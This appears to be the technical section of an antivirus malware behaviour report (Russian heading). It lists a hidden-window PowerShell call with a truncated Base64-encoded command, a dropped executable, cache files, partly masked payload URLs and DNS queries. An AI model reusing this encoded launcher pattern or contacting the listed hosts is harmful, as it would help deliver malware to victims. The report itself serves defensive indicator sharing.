Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -EncoD PAAjACAARwBwAG0AawBuAGcAZgBmAGMAcwAgAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAG0AaQBjAHIAbwBzAG8AZgB0AC4AYwBvAG0ALwBDAHQAbwBwAHUAYQBlAGkAeAB3AHQAagAgACMAPgAgACQAVwBxAGEAbAB4AGkAcwBrAGsAYgBxAD0AJw...
- %HOMEPATH%\427.exe
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- %HOMEPATH%\427.exe
- http://st#####.securenetworks.pk/mn2shwl/UGw/
- http://co###sjapan.vn/wp-includes/a/hotoffice/v2u90/
- DNS ASK st#####.securenetworks.pk
- DNS ASK co###sjapan.vn
- DNS ASK gr##eobd.co
- DNS ASK al###adatv.cl
- DNS ASK fu###.com.tw
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -EncoD PAAjACAARwBwAG0AawBuAGcAZgBmAGMAcwAgAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAG0AaQBjAHIAbwBzAG8AZgB0AC4AYwBvAG0ALwBDAHQAbwBwAHUAYQBlAGkAeAB3AHQAagAgACMAPgAgACQAVwBxAGEAbAB4AGkAcwBrAGsAYgBxAD0AJw...' (со скрытым окном)